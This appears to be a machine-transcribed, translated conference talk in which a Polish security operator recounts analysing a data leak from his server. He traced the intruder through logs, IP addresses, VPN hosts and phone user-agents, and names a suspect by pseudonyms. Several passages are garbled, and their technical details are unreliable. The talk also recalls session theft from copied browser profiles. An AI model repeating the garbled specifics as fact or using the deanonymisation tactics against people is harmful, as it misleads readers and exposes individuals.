
Okay, I know, I know. Can you imagine yourselves sitting on a chair or something? Or not so much? Okay, I hear no objections, so I'll take this chair. Since this is the end, I'll be a little informal with you. I thought there would be fewer people, even fewer than there are. Oops. I was at the Ministry of Digitalization talking to the Minister and I was less nervous than I am now. So, sorry for any language errors. I decided to dig up an article that appeared on my blog a year ago. It was linked by Z3S, so some of you probably know it. If not, you don't read the weekend reading. Either you don't read it at all, or you should. The guys paid for it. So, yes. Analyzing an intrusion with an amateur's eye. I think there are many things here for an amateur. I try not to consider myself a specialist, because a specialist sooner or later loses. And I will discuss the case of a man whom some people know, I mean... We will call him Zdzisiu, because that is the pseudonym he appeared under, or Lick Crew. If anyone would like to find out, apart from the recording, who this person is, or what other nicknames he is connected to, and have a laugh, of course, I invite you.

So let's start with the contest that was announced a few days before SBS. It was about finding a flag on the SMS.pl server. The trick was that you just had to run curl -v against http.sms.pl and you got the flag, as you can see, a black flag in azure color. Ten people answered, including one woman. Five people found the flag. One of the participants is one of the speakers. The other three were given free badges, which had been paid for and given to me as a small gift. The whole catch with this flag is that we use HTTPS. Every time someone from the search engines tried to read this flag from the header using a browser, they were redirected to HTTPS. HTTPS has the HSTS header, which I would like you to use as administrators, because it makes it impossible to attack the SSL account or DLSA, when it comes to the website. It also makes it impossible for the browser to communicate over unencrypted traffic. So it makes it impossible to read the flag through the browser. The only way to read the flag was using the console. One of the most interesting answers I've ever received was checking the source of the website, reading that the website used the IEO font, finding the flag icon and saying that the flag is grey. One person probably said that the flag is black. Unfortunately, she didn't know the value of the flag, so it wasn't recognized. In hex there was this value of the flag in fonts.io, that's why this short text poem. What we see here is a fragment of the email I got from one of our people as an answer.

What is SMS? I come to you every year and introduce myself. I'm Piotr Jasiek, I do something called SMS; you can compare it with sending SMS by phone, but it's Security and Management Systems. At the moment it's a business, I'm very happy to be registered, I can legally pay taxes on what I do. I started from the association, something that grew out of the basement of the Warsaw hackerspace, and for the moment it's an IT company, because we do some services there. I really appreciate our colleagues from NASK, CERT, Adam, Z3S, who can talk about their work, because my clients are completely aware that if there is a compromise, I cannot talk about these cases, because I am often working under the web developers or the server guardians and they invoice the client at the end, so my work is often hidden in a way, and it hurts a bit, because I have to dig up such things or just try to avoid the topic and talk to you somehow. What do we give the client? Increased security standards on hosting, VPS, www. You can see it on the website; this is not a commercial presentation, so I'm referring you to the website, if you would like to see it, I would be happy. If you find errors on the website, I will gladly accept suggestions and so on. I repeat it every year. I gladly accept suggestions about errors, typos and so on.

Analysis in the sense of criminology is searching for the relationship between certain events. Often it is a typical investigation of events. So that's a big problem. It's about verifying certain behaviors, checking the evidence, checking the next versions. There's a text, I'm trying to read it; I also suspected this year that it might be shorter than at previous events. Last year's. There are many kinds of analysis: there is stock market, banking, legal analysis, and all of it comes down to someone sitting down on their backside and analyzing everything from the beginning, checking all the threads, where and how it appeared, and why. Michał, I will use you as an example, because I like you very much. Especially this year, I like you very much for this discussion about the fact that when Michał gets information that something is wrong, he sits down, analyzes, checks; that is also some form of analysis. Computer forensics is one of the forensic sciences. It's a pretty cool thing. It is supposed to provide digital evidence, which is different from what technicians do in the form of collecting fingerprints, cigarette butts, but in computer forensics these are our fingerprints. Here my colleagues recently talked about printer fingerprints. I don't know if you know that photos from phones, apart from metadata, also contain data such as lens data. I think Adam gave an example from CSI. I want to find out what is actually happening there. I think that 80-90% of what is shown in CSI about this, i.e. obtaining data from photos or monitoring, actually happens. I don't want to go into details here. I just wanted to say that the goal is to determine the course of events. We know that. The motives of the perpetrator are obvious. But where did the victim come from? Here my colleagues described, for example, the Quake issue or other such situations. Someone became a victim, but why did they click this email? Why did they deliberately spread this malicious software? Why did he become a gateway? What was his motive? Maybe he wanted to see photos of his friends from vacation on a pendrive that was handed out. This is probably one of the best known examples. He got an unaddressed email to himself and to a colleague from accounting with the PDF of a payment attached. Or, for example, a payslip. This is also very interesting in companies. I also came across this somewhere in the corridors, talking to my friends from pentesting, who say that one of the ways is sending emails with payments. I get a specific email every now and then, which theoretically includes plans for the construction of a shopping mall. The email is only for people, and when you run it through the antivirus, everything turns red. But to be honest, after starting it in a virtual machine, there are some plans, but after restarting, the virtual machine is completely encrypted. And it wants 100 bitcoins from me. Or let's say the old version of ransomware.

The sources of information in a forensic investigation are: floppy disks. Who uses floppy disks? Nobody. Who? NFZ. Okay, it's some... Why did you change... ZUS, okay. ZUS, NFZ... It can be. Why do I go there? Floppy disks are a small space where you can hide small files, a list of compromised passwords, stick it under the desk, and when the police come to search the apartment, they will look for pendrives, discs, hard drives, laptops, computers, I don't know what else, SSDs in electronic form, long ones, not just ordinary ones. But nobody will look for floppy disks, right? Nobody will look for floppy disks in the ventilation. And even if they find floppy disks, there is a possibility that the police officer will see a sticker on it, Windows 95, he will wave his hand and say that it is not important. And there we can actually hold some compromising materials. Backup tapes, i.e. when someone enters the server room, these tapes will of course be secured, copied, and for people who work with servers this is something obvious. Hard drives, no need to explain; as I mentioned before, this is something the police look for. Memory, pendrives, servers. Servers, in my opinion, like VPS, because we keep a lot of data there.
And we are not fully aware of how sensitive they can be, like logs: where and when we log in, how we sometimes proxy our traffic, from which IP addresses we log in to our server, because it may also turn out that these IP addresses correlate with something later, with another server; it turns out that we logged in from the same IP address on day X, when someone filled in the IP addresses somewhere. Okay, it was a Tor address, but it's proof of the past, you can start to figure it out and correlate it. Social media, not necessarily. Pick a person from the street and Facebook, and after 15-20 minutes, I think the record is 5 minutes, my friend was able to build a wordlist to get the password quickly and get into Facebook. It was the name of the dog and the date of birth of the dog, which of course was marked in a post because someone had created a dog fanpage. So why not? Cloud drives, of course, Google Drive or some Dropbox, not Dropbox specifically; we also throw our files and photos there, photos have metadata, most often attached, because of course nothing cleans it, because why would it? Of course, we keep documents. I don't know if you are aware of what is one of the requirements for server location when it comes to storing personal data, when it comes to Polish requirements. Exactly. The EU borders, so storing personal data on Google is bad, bad and punishable. What kind of punishment is it? I don't know. I don't remember if it's a fine or a prison sentence. I think it's a prison sentence. But it's definitely problematic and hard to explain.

And of course, internet browsers. I would like to mention my time at technical school, where a very simple program was written in Pascal, which simply stole profile files from Mozilla; it was enough to copy them to ourselves, run them and we had all the user's sessions, logins, passwords, everything that was saved during browsing. Suddenly it turned out that we had become the same person who lost this data; everything matched except the IP address. If the server or the portal didn't have something like cookies bound to the IP address, we could become that person in a matter of minutes. It worked on Facebook, on all kinds of photo blogs. I once had to explain to a friend how it happened that her photo blog changed into a very ugly erotic page. I think she understood; she stopped saving passwords, started always logging out and stopped using unknown software from the Internet. So it worked. Of course, it was a targeted attack on her. So she had bad luck as an unaware user.

When does a forensic investigator search for shares in Krasno? When there is a defrauding of financial funds. Well, you know, you have to track who, when, how. Here my colleagues talked about bank transfers. If I had known what they would talk about, we could have made a different presentation.
Violation of the labor law, because these conversations between the employer and the manager were also recorded somewhere. "Listen, we will pay less for this, we will pay more, we will cut his hours." This evidence is somewhere. It is often the case that documents are kept as double bookkeeping. In one Excel we write the actual schedule, and in another we write the schedule that we send to payroll, and the worker, out of 240 hours, gets 140, not 160. So where do these hours get cut off? Of course, the forensic investigator investigates the action; we can also talk about SMS communication here, where employees or managers contact each other via SMS, and e-mails can also be added. Data theft, of course; as a forensic investigator, such a person determines how this data was stolen, when and, of course, who stole it, based on the available evidence. Industrial espionage is one of my least favorite types of espionage. If international espionage is fun for me, because it's funny, industrial is not fun, because we steal someone's intellectual property, money, hard work, and it may turn out that someone, let's say Bill, worked for a company all his life, did everything great, then came Michael with one exploit, he gave him a few key codes and it turns out that unfortunately he can't do it anymore because someone else developed it, sold it. Bill's product is not cool anymore because it's old, and someone patented it. By the way, patent law in the US is funny because whoever is first is probably the best. So it's hard to prove that someone was the first, and not someone else. Copyright infringement, as I said, we can also connect it. Disclosure of trade secrets; here we go back to where these messages came from, were they emails? Theft and use of personal data, this is another, not to use bad words, very bad behavior, which appears all over the Polish Internet, the trade in cards, which was often taken down. And something that for some is the last point, for some a commonplace in criminal cases: the drug trade. I'm sorry, we live in times when accounting and communications are carried out on the Internet. Maybe if we did it through carrier pigeons, the police would not be able to get at it. I know examples from the Polish Internet, unfortunately of hackers who fell for stupidity: because he had a few plants, the police came, tried to lock him up for drug trafficking, they took his computer as a precaution, searching for any list of accounts, who sold to whom, the amount of expenses, you know, accounting must be done in every business. It turned out that he had some bad software, he was running into it, they went through his hard drive at the first pass, it turned out that there was a little more evidence than they expected and he had three cases. He was into drugs and then two separate things about hacking.

In recent times in Europe, computer forensics in terrorism should help a lot. The effectiveness of our services and foreign intelligence shows it. Theoretically, we have biometric recognition, we have a lot of security that could allow us to identify earlier. Unfortunately, it is often implemented only after the fact: closing borders, verifying who actually comes to us and who doesn't. In terrorism, there is also the introduction of operational activities, which I mentioned today, such as interviews, wiretaps, obtaining information, intercepting information, disrupting communication between individuals or terrorist groups. This also happens. This way we introduce disinformation and destroy their cooperation, so they are not able to talk to each other. We hope that maybe before we catch them, the guys will think it over, or at least we will catch them before they come up with something else. Murder, suicide. In murders, it's quite simple, like in any other case. In suicides, every suicide is always questioned by the police. The approach shown in some Polish films, where the prosecutor comes and says it was a suicide, it's not like that. It's always questioned, it's always verified whether the suicide was not caused by a third party in a way other than physical. We have a problem with cyberbullying, I remember the term well, which is persecution on the Internet by sending nude photos, editing nude photos, because I often came across someone taking a porn model, editing in someone's face and sending it on. Then explaining such a photo away is also very difficult. The insults, the calls, the touching of someone, it can all lead to a person's suicide. So it is also explained by the technicians, the forensic investigators, and they verify whether there was no influence of third parties on the decision of the person who made such a decision. It's a sad event. And this is what I was talking about a few slides ago about the motives of victims. That something happened, someone had a motive, became a victim, not a perpetrator, but a victim of this crime. But why did it happen? Why did it all come to light? Organized crime: as I said, everyone runs their accounting, and the bigger the organization, the more likely it is to make a mistake. And more data needs to be stored and processed, so I believe the fewer people, the safer. And of course pedophilia. Since the Internet appeared, pedophilia has been... We have to fight. Police, forensic investigators, Internet users are fighting. There are a lot of groups fighting. Recently there was a big takedown of pedophiles in Europe. Who watched Mr. Robot, the first episode? I can spoil it. In the first few minutes there is a situation when Mr. Robot discovers that one of the cafes always has a gigabit connection on its servers, which surprised him. He noticed that it was one of the darknet nodes where pornography is spread, and he reports it anonymously.
Such behavior, when we get such data, we as Internet users, I'll say right away, is not in accordance with the law; it is bad, not good, because we are also criminals, we are violating someone's privacy and dignity, but whether pedophiles deserve to be protected under the same cover, we will talk about that in the corridors, probably. So that's how it looks when this action comes in.

What do I want to talk about today? I want to talk about the situation with Zdzisiu, Zbyszek, Lickryu; let's call him the intruder. A few days before, the intruder looked at his page and commented on a post. Why? How do I know? I will explain it later, I have nice screenshots for that. And now, on the 26th of June, the intruder was collecting data from a publicly available host and found real data. Here was a mistake on my part; I, as the administrator, will bow my neck to the guillotine. He creates a package, on which he puts a paste on Pastebin, of course it's very vulgar, aimed at me, and I don't know what he's trying to achieve. It wasn't a mistake, but an attempt to force something, I don't know, a vote. Or a vote, but not the one he wanted. An email appears in my inbox, sent from ProtonMail. I think that in the life of every administrator who manages anything, anywhere, at least once in his life things got hot when he got an email: "Hey, I hacked you." It's like with a bomb. You never know if it isn't the day you fell in and went down. You might have received 10 emails before; I got another one a week before SBS. This time from a person who signed R3KiN, a so-called shark from WP.pl, but that's a different story. And maybe at this moment something happened. Of course, at this moment you should not dismiss any such message, only verify, reach every possible machine where there was access. Even if there was no access somewhere, you can still go there and verify, because you can never be sure that something didn't happen there. Just like our motto here is "No system is safe". There is none, there was none, there will be none. Two years ago I talked about these three rules, so-called MRX, meaning there is no secure system, there are no impossible things, and play not only with the computer but also in the real world, i.e. social engineering. Three such rules that I always remind people of.

I receive a private message, read an email, post the paste and info on social media. I decided to play the intruder's game and voluntarily admit to any error and publish that I received an email with a leak of my data. I consider myself a protector and I can recommend it. I think it's fair to those I help protect, to protect myself. It's a bit of a hint not to be afraid to admit mistakes. Because when someone admits to mistakes, you can find Jacek, Tomek, Staszek, who will come and say "I know what could have happened, I will help you, it will be better." When we hide such situations, we dig our own graves. I don't remember, I think Sony got hit in the back some time ago. They probably delayed the publication of information about the attack for a week, and it ended up that no employee could log in. A week of delay and you wonder what happened. Unfortunately, a week is too long, maybe a company would report something. The same thing happened with the hosting company Adweb, I don't want to name names now, but they also delayed with the admin, then there was a problem with the admin and they had to deal with it again only after the fact with the help of people from outside. So I decided that it was worth publishing this information. And, attention, the last part of this sentence: "I'm leaving a trap." I suspected at the first moment, after looking through the package, that I probably knew who it was. I knew that this person is not very clever. I expected that one of the IP addresses I had in the logs, because of course I copied the data somewhere, would come to this article and repeat, or would not look, would repeat its activity, that this activity would be repeated, and I would know that the same address and the same data would appear again. I start reading logs at 1 p.m., at 2 p.m. I already know everything, I write an article, I do log analysis, that's it, by 8 p.m. I finished the article. At 20:42 the intruder gets in touch again and assures me that it was all a joke. If anyone wants to read the conversation, then on the blog, in the other section of the blog, there is this article. I haven't read this conversation here, because it was bad. The intruder says that it was just a joke, that he was just joking and so on. If you see the message, you will judge it for yourself. The data analysis and the full evidence are real; it took me 6 hours. I had to do my own things; unfortunately it was a period when I was not only living with SMS, but also with work, with home, with cooking, with dinner, with a sandwich, one has to eat.

At the beginning there was chaos, I mean the e-mail. It started to show up quite well, so I think you can see it on the stream. The email came to my server at 6:34. Someone really can't sleep. I'm sleeping well at this time, because I wake up at 7 a.m. most often. So, send me emails after 7 a.m. Then we can have fun. Hacking after 7 a.m., between 7 and 22, is best. Then I'm sitting at the computer. Now, "welcome Mr. Hacker, whoever reads this, who doesn't know what .htaccess is." Okay, I'm using nginx. In nginx there are also equivalents of .htaccess, but you can do it much more intelligently than in .htaccess. "Here is a broad tutorial," thanks for the information, it was useful, I used it later. "The data is on your dedic, so run it." The first characteristic trait of this person: mistaking the letter L for R, and it's not intentional. The pastebin, of course. This pastebin is active, I didn't fight for it to be deleted, it still is. If anyone wants to read it, I invite you. I don't know if it will be visible well later. "We are a super party." Of course, a direct quote from YouTube. "PPS, gimbuses are just pushing you because I put it on Mirko on Wykop." Of course, it was about the Wykop community and the way pages are thrown there, and then it ended up with someone getting DDoSed. Of course, there was no DDoS; I was so eager to put an account on Wykop to add it, or even add a post, because I really wanted it to be a DDoS. Because then I had a deal with the server owner that if there was a DDoS, they would give me the addresses from the attack, to have more data for analysis. Unfortunately, it didn't happen. I was very sad about it. "Why are we doing this? Because you are a pervert, a prissy, self-confident fan of the Internet, Star Wars, Metasploit and pepper chips." I can't eat pepper chips, it makes me very sad. I like Metasploit, I trained on it, so if you want to learn Metasploit, Nexpose, Rapid7, vulnerability management, let's talk about it. I've only watched the MTCIT, I like the scene of cutting edges. "I'm a fan of the Internet": I'm an IT specialist, I like the Internet, I'm addicted, yes. "From the beginning, a lazy, prissy, fan-like person." "Not that fat, that's good." As you can see, I don't know about lazy, I dressed nicely today. Lazy, no; fan-like person, we've already explained that. "You're bullying poor people, you're trying to educate them and you're taking money from them." I didn't get to the point where I was wrong; maybe it's because before we were an association we organized a small donation for domains and server maintenance, which we didn't give back because we made money so we could give it back. It was about us being pushed out, there was no income and we didn't want to spend a few hundred zlotys from our own pockets to maintain all of this. We gave back the money; greetings to Lapis and the whole company that helped us, we thank them greatly. Next point is PPS. "Even if you go to the cops and they see an IP log from Tor, you will get a letter from Marge." Cool. I thought they would die after 30 days, but okay.
I wanted to point out the use of PPS. While PPS is still working, PPS is still here. So another indication that this person is not very intelligent. "And we are greeting Lick Crew, Black Hat Rules." My hands are cold, seriously. This is really nothing, let's go on. We have now come to the pastebin. The link to the paste was also received on IRC. No, well, great, of course, there is Lick Crew, beautiful, there is a pastebin. Yes, I know, I had an old version of XChat, it was some Windows, so I tried to start it quickly. There is of course Android IRC, because why change the ident? Why not? You can work this way. Pastebin is the best place to put leaks? Yes. Don't be fooled, it's good. I don't know if you can see it. It's hard, right? I can see a little better, so I'll read it to you. "Today we are putting out some data of a certain IT security operator, Piotr 'Pechata' Jaśek." I recommend reading the dictionary of the Polish language, because my name doesn't decline, contrary to appearances. It's from a foreign country, several generations back. But he could have asked before he wrote an email. If he sends the data, why not? "This individual is so arrogant that he deserves a punishment." Wow, cool. I'm doing something good because I have enemies, right? It's probably okay. "His servers, hehe, dedyk, turned out to be an ordinary VPS for narne djingi." I've read it so many times before the presentation, I still don't know how to read it. "We used Rotbox," which is currently getting advertising; they didn't pay. Like the others that I will advertise. I'm kidding, nobody paid. Poor thing. But the point is that we have advanced in terms of savings. Let's face it, being an association with a few members, minimal cost, you have to save. But okay, great, he put it out for us. "His cool data is in deep hiding. HTTPS 62181 847." The address is no longer there, it was removed a long time ago for other reasons. "Screenshots and the RSA key to the shell are in the package. The address of the shell is 52181 847, port 22."
Excuse me, what a miracle: I keep my data at 62181 and my shell is at 52181. Someone was messing with the lettering, right? So he didn't even read it before he published it. I suspect that his conviction about the secrecy and authenticity of the data was so great that he decided to publish the data quickly and unambiguously. What he published, we'll see later. "The address of the SMS.pl blog is the address where, we reckon ('Sądzimy'), he lives, Kochanowskiego Street, Wawa is a dick." I will of course open the package link. I like the wording "Sądzimy". I already knew that this was not a person from Warsaw. "Who are we? Here is the best. Known for various fucking flaws." I guarantee you that I called a friend, a security guy at a very serious company, and asked if he knew these people. I will not try to answer, but it was: "What are you doing here? I think I'm doing this." He is KG and he even said that these are no-names. It turned out that it is another one generated by our beloved friend, we will call him that sarcastically, Zdzisiu, another pseudonym and his actions. "We don't have any cool hacker tips like this one, but today he's unlucky." Unlucky. Unlucky. I mean I'm unlucky, Pechata, but this situation, the joke didn't work out. "Greetings for the hacker from Białywierz." If someone explains to me what's going on, I'll buy a beer. Okay, you have a beer. Okay, okay, the beer is gone.
Michał was the first. But you know what, I didn't think about this side, but no, this person is not sitting in Białywierz. Not anymore, not anymore. I know that not anymore and not on Białywierz. PS, high school students, Move your ass, install Nmap, because it's set to UI services. Of course there is H in front of UI, but without C, so it would be shorter. So it has some complexes. May onion be with you, habenus papa. Smiles from Pope and onion. It doesn't fit, it bites a bit, but okay, let's say it's a very serious player, it still does what it's supposed to. My fault. What's the point? I'll explain. It turned out that when I was configuring NGX for the first time
in my life, because it was the period when I was going to NGX as an administrator, behind the words of Hehesa, who is somewhere here, I forgot to configure the default config for SSL. And of course I threw out the first available config, as it turned out it was my FTP, I mean www FTP that I used to send data to my friends, like a wallpaper, logo of Illuminati, kernels, I needed apt. I learned Python, I was working on something, there were folders of SMS, there were materials. I hope this person learned a lot from my materials, because there were a lot of them, there were prices, from zero to hero, when it comes to C++, there were dives in
Python, there was a lot of it. Maybe he learned something, I hope; maybe not. And if he installed that kernel, I feel sympathy for him, because there was a bug that I missed, and after reinstalling everything over and over the system just stopped working. It worked as before, but on that kernel the kernel simply collapsed. I don't know why; I only found it today. It was the first kernel compilation of my life. Of course, the package was uploaded to Google. Of course we have the time: 26.06, 05:15, created 05:15, ph.leak.zip. OK, great, let's go on. The full version, I promise, I'll buy it someday.

We have an important piece of information here, which we laugh about, but it matters for the analysis. I know it looks like I'm making fun of myself, but I want to show you how I, as an amateur who likes jokes and not a really serious person in the industry (I don't claim to be a serious person in the industry; I'd rather work with serious people like Mac or the guys from CRT, who can act on their cases and talk about them; unfortunately, I often clean up after such situations and can't talk about those cases; it's a pity that we laughed about it at this conference)... The important thing is that the ph folder was modified, created or last changed at 5:04. This is the first important piece of information which, in addition to the email that was sent, tells us when the attack took place.

Let's go further. Of course we have more dates here: 4:55, 4:43, 4:52, and again 4:43, 4:52. They overlap, so he didn't modify these screenshots in any way. And he should have, seriously. I mean it, he should have modified them, and I'll say why. You can see the dates of the shots, and they can also suggest what device was used, whether it's a capture or not. These are specific screenshots. Guess what device he used? Yes, Android, but he used a mobile phone to take the screenshots. I didn't think about it then; maybe my knowledge was a bit too limited, I was just so excited and laughing that I decided to give it to you. I suspect that if I took the metadata of these photos (and I suspect that after packing them into an archive it would still be kept), I would get the geotag, I would get data like... I don't know what else is in those photos: the geotag, the phone model, what time exactly, whether it was dark in the room, everything. I suspect he definitely had a geotag on his photo, so I think that would have been the end of the story. But let's move on.

These packages. The package contains one of the SMS meetings; unfortunately Mariusz Litwin is no longer here, but he was the creator of this. We watched Star Wars over the Internet. If someone doesn't know how to play it, ask Mariusz Litwin, he'll tell you. I see Michał nodding his head. Do you know this? It's great, right? Two hours to play Star Wars and drink beer. Okay, it doesn't work. Now Patryk. Okay.

These are screens from my computer; I decided to do it this way. The second screen is the index and the address. public_rsa: I found the key. Do you remember what key was revealed? The private one. What is the public_rsa file? I think English isn't our friend again. It's a UNIX file, because it's called id_rsa; I'm sure I remember it correctly. I'm showing you what's inside. After I highlighted public_rsa, Windows showed me this signature. H1, nothing interesting, just keep going. It's the default index from pht.sms.pl. It worked so well that it fetched the index, not the file. They made a mistake in
the GET or curl command; it's hard for me to say which. Moving on, of course we have a lot of photos and dates, and on the first two screens we have a lot of important information. The first important piece of information is that when carrying out the attack, he may be using something like OpenVPN. It's valuable information, because we will use it later to pin down his identity. The second valuable piece of information is that besides using Android, he uses a GPS connection, or LTE, or H+; I don't remember what H+ is, I think it's HSP. Okay, good. I see you're helping me with this. I was afraid you'd go quickly and without reaction. Okay, so we know that he uses OpenVPN and some mobile SIM card. He doesn't use a Wi-Fi connection, which would be a little harder to trace, because those often repeat, change, and there's trouble with them, at least in my opinion.

We go further. We read the logs, part 1. Of course, I dumped all the logs from the 26th. And we see that some Applebot shows up. And we have this IP address: 78.46.47.126. Around those hours that were mentioned, public_rsa, /, favicon, public_rsa, pkpa show up. So we know that this is our intruder; he is looking at the data. Let's go further. Identification of the IP address. For the IP address it's of course nmap, because that's what they told us to install. We run it against this address and we look at it. And of course, what do we see? On some ports there is something like port 80. Wow, we've identified the server. Would it be that easy? Unfortunately not. But it turns out that the main server is client.openvpn. Of course, opening this OpenVPN showed that on one of these high ports (I bow my head here to whoever changed the port) it was set to listen on a high port. Later it turned out to be a public VPN, one of hidemyass.com's, so it's a dead end, but we already have some data.

Let's go further. What else do we see here? We see that our intruder didn't use the default option of the peer. I emphasize, it was a peer. A peer for many clients uses the IP address and the host to hash. It hides the IP; he didn't use it. And if he had used it, I would have had to write to the administrators, who might like me or not, and maybe they would tell me what IP address they had, or not; it would be difficult. I know because I set up my own network, and I'm telling you, seriously, it may be difficult to talk to an administrator, because someone has talked to him before and it wasn't possible to get it. And again, as I say, there is this address.

What do we do next? We read the logs, part 2, and we look for this IP address. What happens? We have the IP address again, on the 26th at 13:00. After sending the information to the social network, the intruder returned from the same IP address from which he had sent me a message on IRC at 7:00. Bravo, intruder! As for the behaviour that appeared at the beginning: first he checked some IP address with OpenVPN, is it anonymization? Great. He sent me a message on IRC from another IP address, great, another point for him, because that's another IP address to deal with. At first I thought it was his real address, but later I looked at this adslplus.kch and thought, I don't know what country it is, let's assume it's... I'm telling you, I don't think Switzerland is hacking me, I'm not that well known on the Internet. And we looked at the logs under this address. We got a lot more, because we were looking at favicon, coq, the contacts we were downloading from favicon, we were looking at the kernel repository, css was taken; nothing special, but there is one thing. A common denominator: Nokia N73 build/jdq396. It's quite characteristic for all phone models when it comes to the user agent, but the probability that someone would be messing with us from the same IP address, which is a proxy, with the same phone model is very low. It's still only evidence, I emphasize; we still don't have 100% certainty. I mean, I only got 100% certainty after I found out who this person was, so unfortunately it turned out differently.

I downloaded all the logs I had: from before the migration, after the migration, and from Kinko and the other sub-servers I manage. I was looking for everything down to the last trace. So I went beyond my usual scheme of looking only at the current time. What turned out? Looking for this Nokia... I won't draw attention to one basic error that is on these screens, but fine, I'll tell you later what the error is. Of course everything is nice and beautiful, there's some stack of garbage where something is being checked, 26, 26, right? And what happens? On the 23rd,
his entry appears. So the entry was already on our server on the 23rd. Okay, let's keep looking. Non-track IP address. You see? Here. There is another address, the same client, the same behaviour. There's an hour there, yes. It's a Play address. So again, we confirm that it may be our intruder, because he uses a phone and connects via HSP, i.e. mobile.

Questions for the evidence, for now. On June 23, 2016, at 3:16 p.m., the address was given as it was in the presentation. I won't read it, because it doesn't make sense. This person, between 26.06 20:31 and 26.06 20:56, connected to the host using OpenVPN on port 1194 or another. At this point the configuration could have been a little different than in the later file. So we assume, in general: what is the VPN host? The providers see what we are doing, let's face it; one of the colleagues said earlier that such data can be ordered. So they don't block, they don't do anything, because they don't have the right or the need to do it. If they had the right and the need, they would do it. And of course the third question: was this person, in the time between 19:26 and the 26th, when we have 13:31 and 13:45, connected with 178.39 in any way that allows tunnelling data? I didn't find it; I didn't want to look for tunnelled data, though it could be a tunnel. Unfortunately, your programming is everywhere and I admire it, because many people use it. That's why it's so nice and beautiful and used by everyone, even in our day-to-day life, I guess. So it's a big plus for you that you created easy, simple programming that is pleasant. So that's a big plus. I know you are a bit cold this year.

We are able to establish three basic pieces of evidence, we ask questions about them and of course we get certain answers. Three times yes. It's an order, an order; not much is said about it, from what I learned yesterday after consultation and the presentation. I set the time needed to arrive at or reach this intruder very pessimistically: 24-48 hours. What do you think, how much is it? The regulations say that the police have an obligation to contact the operator, and the operator has an obligation to hand over the documents. So in a good case, if it were a theft of several million, I think that within 5 hours they would be at his door, counting the drive. Therefore, taking this into account too, I think it was very elegant here.

But let's go further, because there are still a few slides. Of course, these are road signs. Other intruder activity. Of course, as I said, I was looking for other activity, because I'm not a legal entity; when it comes to the police and the services, I don't have access to those databases to check it, to analyze his movements. I decided to look for what he was doing at my place. Of course, I was looking for this Nokia, skipping the 26th. Seriously, I got a stack of garbage; it's really cut down, because there was a lot of it. He's a regular visitor on my page, so I'm glad. Maybe he's watching me now; I'm helping him. I suspect that in three days I'll get the information that he broke in. I'll have something to do, thanks. Of course, something like this will appear at the very end. I'll comment on the intro. He commented on the post: "Zosia Samosia is migrating from the admin's monument." Of course, it's WP comments. There is Linux Android 4.2.2, so if we wanted to prepare an exploit for his phone, that's also possible, why not. We have a specific phone model and its build version, so we could prepare it again. Nokia, so Windows Phone, more possibilities to prepare an exploit and take a picture of him with his phone's camera. Android, oh yes, sorry, Android, yes, it's still... Okay, good, you know it well, but I got lost.

But what am I going to do? He commented: "If I know the date, time, my blog, I know the article..." I even answered this comment. Leszek: "What about securve.pl? Apparently it was hosted at your place, but it's gone." My answer: "Aden, the website you mention, has abandoned the project. In addition, all access was taken away from him due to the security violation he allowed." Seriously, it was hardcore. When I get a call from one of the administrators, because it was a rented server, that something is happening, and while my blog activity doesn't bother them and they are generally available for this and for everything, then strange things start to happen on this hosting and some spam starts coming from it. We blocked it; the person lost it. It turned out that on one of the shots he got, he also tried to root, but it didn't work out. This is a story for another presentation, how he tried to get root. So here we have a motive, right? And a suspicion of who it could be; of course, it turned out that it was the owner, the person who ran this site. This person... well, there is a motive, we have a suspect; if we were the services, then at this point we'd call the prosecutor and file a complaint, right? If you don't have HackerBox, use Google.

What I mentioned at the beginning, not everyone noticed: Zbigniew Budziewski. Was the same thing generated on the basis of this break-in? No. It's another fake account on Facebook, which was verified by a person. I mean, it was verified by me on the basis of a call: "Hey, listen, is X Y?" Yes. Thank you, end of topic. My vampire has been solved. The interesting thing is that Nikos probably noticed that the package is signed with a name and surname. Maybe someone from the list, but probably Nikos, because he's laughing. I missed it completely. Believe me, I was so obsessed with reading logs that I
missed such an obvious thing. Of course, I googled it here. It's hard to see, but maybe I'll post it on the stream later. There's an article on the website, everyone can read it. It's a bit crummy; I was emotional and decided not to make it easier for the reader to go through the situation. He doesn't want to cry, but he also wants to laugh, it's funny.

To sum up, it was probably the best time I had on IRC. I won't read it, everyone will read it for themselves. So, the summary was so beautiful: if you are an administrator of anything, anywhere, remember that your system will never, never, I promise you, never be 100% safe. Last year there was a beautiful presentation saying that there is always one error in every piece of software that hasn't been found. There will always be a problem that you missed. Like here. I don't know who said it, last year or this year: don't invent your own cryptography, because it won't do you any good. If there is no one to verify it, it will always be bad. Although I don't know how you would be convinced that it is good. The problem is that mistakes like the ones a few screens back could end really badly. I know admins who keep their private keys the way I keep public ones. If this time we laughed and it was fun, and we had fun with the last presentation that was a bit loose at the end, then who knows, in another situation I might be standing here crying and talking about how I lost a few million customers because I made a stupid mistake. A stupid mistake could change everything in my career, and it doesn't matter if it was me, AdamZ3S, or any other person; if it were some dangerous person, he would be destroyed, no matter what PR he had. And there's no reason to laugh. Such situations are dangerous for everyone, and if we don't have this awareness and responsibility, if we consider ourselves the Iron Man, the Captain America of IT and security, sooner or later someone will appear with kryptonite and we will fall like Superman. It will end.

Is there anything else I wanted to say? Well, as I said, the best was on IRC. The question is how to be a celebrity? I don't think so. However, the answer to this question is beautiful. If you are a celebrity, random noobs from the Internet try to hack you. If they find your automatic www index somewhere on your server and your public key on it, they hype: "Wow, I hacked a phat." I think that's it. And that's the message I wanted to convey: everything is funny until the end. And that when you come back home, if someone has indexes or isn't quite sure, the question will be right there. That he will come back and check and check and think three times whether you can actually sleep peacefully tonight. If not, correct me.

Today someone laughed at me, and I looked at this person, I looked at him for a moment, but I won't say it out loud; she laughed that I don't go out in the afternoons and get up at 5 am. Updates won't do themselves, and unfortunately these emails come more and more often and will keep coming more and more often as I expand my activity, and I'm aware of it. And the question now may be what I did when I received this email. I reinstalled everything that was given; I reacted. You can say that I'm a typical schizophrenic, a person who is disturbed by everything. Why? I preferred to be sure that I'm fine. 5-6 days ago I got another email with this information. I checked all the logs, I made sure that there was no break-in, I'm 100% sure, because there was no trace, neither at the vendor, nor at my place, nor on the firewall. By the way, if anyone wants to ask what I use, I invite you. Nevertheless, the server went for a clean-up. All the data was checked and secured, and then the server was set up from zero, including the Debian installation: at the level of its installation and taking the distro from the beginning. Because I was afraid that I could still miss something, despite my administrative certainty. That's it for the presentation. Now questions from you to me.

I have a question. At the beginning there were some jokes about Białołęka. You suggested that this person is no longer in prison. Did any consequences follow from this or similar threats, let's call them attacks or attempts?

